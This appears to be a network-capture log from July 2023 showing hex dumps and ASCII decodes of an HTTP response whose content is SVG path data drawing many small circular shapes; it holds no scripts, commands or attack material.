                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2517INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2533INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2549INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2565INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2581INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2597INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2613INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                                                                                                                          Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2629INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2645INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2661INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2677INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                                                                                                                          Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2693INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2709INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2725INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2741INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                                                                                                                          Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2757INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2773INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
